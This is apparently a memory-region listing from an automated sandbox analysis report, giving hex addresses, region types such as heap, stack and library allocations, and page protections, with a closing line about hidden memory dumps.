|
913000
|
heap
|
page read and write
|
||
|
6A2CF000
|
unkown
|
page read and write
|
||
|
42E000
|
unkown
|
page read and write
|
||
|
8314000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
691D6000
|
unkown
|
page readonly
|
||
|
27F76F55000
|
heap
|
page read and write
|
||
|
3C10000
|
trusted library allocation
|
page read and write
|
||
|
6A1A2000
|
unkown
|
page execute read
|
||
|
33B9000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A6CF000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
10C1000
|
unkown
|
page readonly
|
||
|
4FF0000
|
trusted library allocation
|
page read and write
|
||
|
934000
|
trusted library allocation
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5267000
|
heap
|
page read and write
|
||
|
21170000
|
direct allocation
|
page read and write
|
||
|
54E000
|
stack
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
72E000
|
stack
|
page read and write
|
||
|
69890000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
68698000
|
unkown
|
page write copy
|
||
|
6A0B4000
|
unkown
|
page write copy
|
||
|
36A4000
|
unkown
|
page read and write
|
||
|
6A911000
|
unkown
|
page read and write
|
||
|
86D0000
|
direct allocation
|
page execute and read and write
|
||
|
2FE2000
|
unkown
|
page read and write
|
||
|
2F20000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2FE2000
|
unkown
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
73A000
|
heap
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
8771000
|
unkown
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
381F000
|
stack
|
page read and write
|
||
|
860000
|
unkown
|
page readonly
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
5A6000
|
heap
|
page read and write
|
||
|
85EB000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
547B000
|
heap
|
page read and write
|
||
|
694D1000
|
unkown
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
85F000
|
heap
|
page read and write
|
||
|
7371000
|
unkown
|
page execute and read and write
|
||
|
698D7000
|
unkown
|
page read and write
|
||
|
A8ECFFC000
|
stack
|
page read and write
|
||
|
2D39000
|
heap
|
page read and write
|
||
|
85AC000
|
stack
|
page read and write
|
||
|
3449000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3439000
|
heap
|
page read and write
|
||
|
341E000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6DB8D000
|
unkown
|
page read and write
|
||
|
88D1000
|
heap
|
page read and write
|
||
|
A1F000
|
stack
|
page read and write
|
||
|
27F78A0F000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
DFC000
|
stack
|
page read and write
|
||
|
6A8B8000
|
unkown
|
page write copy
|
||
|
5F2000
|
unkown
|
page execute read
|
||
|
8E5000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
13F8000
|
system
|
page execute and read and write
|
||
|
3ADA000
|
heap
|
page read and write
|
||
|
88DA000
|
heap
|
page read and write
|
||
|
6AA7E000
|
unkown
|
page write copy
|
||
|
27F76D10000
|
heap
|
page read and write
|
||
|
6AA7D000
|
unkown
|
page read and write
|
||
|
21490000
|
direct allocation
|
page execute and read and write
|
||
|
82A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AE000
|
heap
|
page read and write
|
||
|
6A927000
|
unkown
|
page write copy
|
||
|
6A1A1000
|
unkown
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
68723000
|
unkown
|
page write copy
|
||
|
6A9FC000
|
unkown
|
page write copy
|
||
|
917000
|
heap
|
page read and write
|
||
|
698D4000
|
unkown
|
page write copy
|
||
|
686A3000
|
unkown
|
page read and write
|
||
|
10EB000
|
unkown
|
page read and write
|
||
|
32CE000
|
stack
|
page read and write
|
||
|
46C0000
|
trusted library allocation
|
page read and write
|
||
|
6A8A1000
|
unkown
|
page write copy
|
||
|
686B7000
|
unkown
|
page write copy
|
||
|
6A833000
|
unkown
|
page write copy
|
||
|
691B2000
|
unkown
|
page write copy
|
||
|
57DA000
|
unclassified section
|
page read and write
|
||
|
84E000
|
heap
|
page read and write
|
||
|
9BDC000
|
direct allocation
|
page execute and read and write
|
||
|
4088000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A6D1000
|
unkown
|
page write copy
|
||
|
47EA000
|
unkown
|
page read and write
|
||
|
6A71A000
|
unkown
|
page read and write
|
||
|
30BD000
|
stack
|
page read and write
|
||
|
8A3000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A933000
|
unkown
|
page write copy
|
||
|
3940000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
6EF9000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
861000
|
unkown
|
page execute read
|
||
|
1860000
|
unkown
|
page readonly
|
||
|
2F1B000
|
stack
|
page read and write
|
||
|
8FE000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
88E2000
|
heap
|
page read and write
|
||
|
7050000
|
heap
|
page read and write
|
||
|
735000
|
heap
|
page read and write
|
||
|
829F000
|
stack
|
page read and write
|
||
|
5B2F000
|
stack
|
page read and write
|
||
|
5C90000
|
unclassified section
|
page read and write
|
||
|
F0F000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
48D8000
|
trusted library allocation
|
page read and write
|
||
|
1270000
|
heap
|
page read and write
|
||
|
27F78BAE000
|
trusted library allocation
|
page read and write
|
||
|
40EC000
|
unclassified section
|
page read and write
|
||
|
307D000
|
stack
|
page read and write
|
||
|
6F10000
|
trusted library allocation
|
page read and write
|
||
|
2112C000
|
stack
|
page read and write
|
||
|
20E9F000
|
stack
|
page read and write
|
||
|
6AAB6000
|
unkown
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
532E000
|
stack
|
page read and write
|
||
|
6A82A000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2C90000
|
unkown
|
page read and write
|
||
|
88E000
|
heap
|
page read and write
|
||
|
AFDC000
|
direct allocation
|
page execute and read and write
|
||
|
6A0B3000
|
unkown
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
69982000
|
unkown
|
page execute read
|
||
|
93D000
|
trusted library allocation
|
page execute and read and write
|
||
|
39D2000
|
heap
|
page read and write
|
||
|
345C000
|
heap
|
page read and write
|
||
|
6A9FA000
|
unkown
|
page write copy
|
||
|
43A000
|
unkown
|
page read and write
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
6910000
|
direct allocation
|
page read and write
|
||
|
39D6000
|
heap
|
page read and write
|
||
|
975000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F78900000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5540000
|
direct allocation
|
page read and write
|
||
|
27F78900000
|
trusted library allocation
|
page read and write
|
||
|
27F76DFF000
|
system
|
page execute and read and write
|
||
|
4FEA000
|
trusted library allocation
|
page read and write
|
||
|
4E6E000
|
unclassified section
|
page read and write
|
||
|
837B000
|
heap
|
page read and write
|
||
|
68694000
|
unkown
|
page write copy
|
||
|
88FB000
|
heap
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3FD2000
|
unclassified section
|
page read and write
|
||
|
40B000
|
unkown
|
page write copy
|
||
|
2F3B000
|
heap
|
page read and write
|
||
|
6DB70000
|
unkown
|
page readonly
|
||
|
6A9EE000
|
unkown
|
page read and write
|
||
|
6A0B0000
|
unkown
|
page readonly
|
||
|
1270000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
3960000
|
unkown
|
page execute and read and write
|
||
|
2BF6000
|
heap
|
page read and write
|
||
|
1030000
|
unkown
|
page readonly
|
||
|
54AE000
|
heap
|
page read and write
|
||
|
6A2B7000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8882000
|
heap
|
page read and write
|
||
|
6DB71000
|
unkown
|
page execute read
|
||
|
8DC000
|
heap
|
page read and write
|
||
|
686A0000
|
unkown
|
page write copy
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
43E000
|
unkown
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
698D8000
|
unkown
|
page write copy
|
||
|
20480000
|
direct allocation
|
page read and write
|
||
|
6A71C000
|
unkown
|
page read and write
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A189000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
6AA08000
|
unkown
|
page read and write
|
||
|
52AE000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A828000
|
unkown
|
page read and write
|
||
|
6A935000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3926000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
694DA000
|
unkown
|
page write copy
|
||
|
5A8000
|
unkown
|
page read and write
|
||
|
4826000
|
unclassified section
|
page read and write
|
||
|
6BFC5000
|
unkown
|
page write copy
|
||
|
3414000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
46BE000
|
stack
|
page read and write
|
||
|
204E0000
|
direct allocation
|
page read and write
|
||
|
5E8000
|
unkown
|
page execute read
|
||
|
694C0000
|
unkown
|
page readonly
|
||
|
36DC8000
|
system
|
page read and write
|
||
|
20CB0000
|
direct allocation
|
page read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
27F76E80000
|
heap
|
page read and write
|
||
|
68651000
|
unkown
|
page read and write
|
||
|
69411000
|
unkown
|
page read and write
|
||
|
36DD2000
|
system
|
page read and write
|
||
|
6A9B0000
|
unkown
|
page write copy
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
2D4E000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
20F58000
|
heap
|
page read and write
|
||
|
6A2C8000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
25F4000
|
heap
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
69390000
|
unkown
|
page readonly
|
||
|
2540000
|
heap
|
page read and write
|
||
|
346D000
|
heap
|
page read and write
|
||
|
8E5000
|
heap
|
page read and write
|
||
|
6A9AB000
|
unkown
|
page write copy
|
||
|
691E7000
|
unkown
|
page write copy
|
||
|
6BFC8000
|
unkown
|
page write copy
|
||
|
B5A000
|
stack
|
page read and write
|
||
|
21138000
|
heap
|
page read and write
|
||
|
6990000
|
direct allocation
|
page read and write
|
||
|
12A4000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
14D0000
|
unkown
|
page readonly
|
||
|
1050000
|
unkown
|
page read and write
|
||
|
A8EEFFE000
|
stack
|
page read and write
|
||
|
77A000
|
heap
|
page read and write
|
||
|
68652000
|
unkown
|
page write copy
|
||
|
82F5000
|
heap
|
page read and write
|
||
|
91FE000
|
stack
|
page read and write
|
||
|
C80000
|
unkown
|
page readonly
|
||
|
691EE000
|
unkown
|
page write copy
|
||
|
475E000
|
stack
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
DF5000
|
heap
|
page read and write
|
||
|
5AFE000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3414000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1670000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
88ED000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3DA9000
|
direct allocation
|
page execute and read and write
|
||
|
27F78A02000
|
trusted library allocation
|
page read and write
|
||
|
875000
|
unkown
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
38B0000
|
trusted library allocation
|
page read and write
|
||
|
69203000
|
unkown
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
6A86A000
|
unkown
|
page write copy
|
||
|
6A791000
|
unkown
|
page read and write
|
||
|
57EC000
|
trusted library allocation
|
page read and write
|
||
|
2F54000
|
heap
|
page read and write
|
||
|
69425000
|
unkown
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
68661000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
910000
|
trusted library section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A94D000
|
unkown
|
page write copy
|
||
|
6DB8F000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6865B000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1172000
|
unkown
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
5499000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
5475000
|
heap
|
page read and write
|
||
|
6A743000
|
unkown
|
page write copy
|
||
|
6A820000
|
unkown
|
page read and write
|
||
|
6A9A0000
|
unkown
|
page write copy
|
||
|
346E000
|
stack
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
235E0000
|
unclassified section
|
page execute and read and write
|
||
|
1670000
|
unkown
|
page readonly
|
||
|
96A000
|
trusted library allocation
|
page execute and read and write
|
||
|
3417000
|
heap
|
page read and write
|
||
|
20CA0000
|
direct allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
39F1000
|
heap
|
page read and write
|
||
|
373D4000
|
system
|
page read and write
|
||
|
10C1000
|
unkown
|
page readonly
|
||
|
14D0000
|
unkown
|
page readonly
|
||
|
20F78000
|
heap
|
page read and write
|
||
|
6A823000
|
unkown
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
691E4000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
21170000
|
direct allocation
|
page read and write
|
||
|
84D000
|
stack
|
page read and write
|
||
|
27F78BA4000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
691B0000
|
unkown
|
page readonly
|
||
|
546F000
|
heap
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
20EF0000
|
heap
|
page read and write
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
2140A000
|
heap
|
page read and write
|
||
|
6F62000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
68697000
|
unkown
|
page read and write
|
||
|
337E000
|
stack
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
1030000
|
unkown
|
page readonly
|
||
|
698D2000
|
unkown
|
page read and write
|
||
|
6A8B7000
|
unkown
|
page read and write
|
||
|
6900000
|
direct allocation
|
page read and write
|
||
|
596C000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
21170000
|
direct allocation
|
page read and write
|
||
|
20960000
|
heap
|
page read and write
|
||
|
6A9A6000
|
unkown
|
page read and write
|
||
|
2D31000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A180000
|
unkown
|
page readonly
|
||
|
691F3000
|
unkown
|
page write copy
|
||
|
6E44000
|
heap
|
page read and write
|
||
|
6FF000
|
stack
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
68667000
|
unkown
|
page write copy
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
4010000
|
unkown
|
page read and write
|
||
|
6E8D000
|
heap
|
page read and write
|
||
|
4D60000
|
unkown
|
page execute and read and write
|
||
|
691B4000
|
unkown
|
page read and write
|
||
|
27F76F46000
|
heap
|
page read and write
|
||
|
54AB000
|
heap
|
page read and write
|
||
|
6A71B000
|
unkown
|
page write copy
|
||
|
949000
|
trusted library allocation
|
page read and write
|
||
|
6AA16000
|
unkown
|
page read and write
|
||
|
AE0000
|
unkown
|
page readonly
|
||
|
68725000
|
unkown
|
page read and write
|
||
|
6A90F000
|
unkown
|
page write copy
|
||
|
24BE000
|
stack
|
page read and write
|
||
|
82D0000
|
heap
|
page read and write
|
||
|
67BE000
|
stack
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
6869A000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
47DE000
|
trusted library allocation
|
page read and write
|
||
|
626000
|
unkown
|
page execute read
|
||
|
6920B000
|
unkown
|
page write copy
|
||
|
B5A000
|
stack
|
page read and write
|
||
|
536E000
|
stack
|
page read and write
|
There are 1280 hidden memdumps, click here to show them.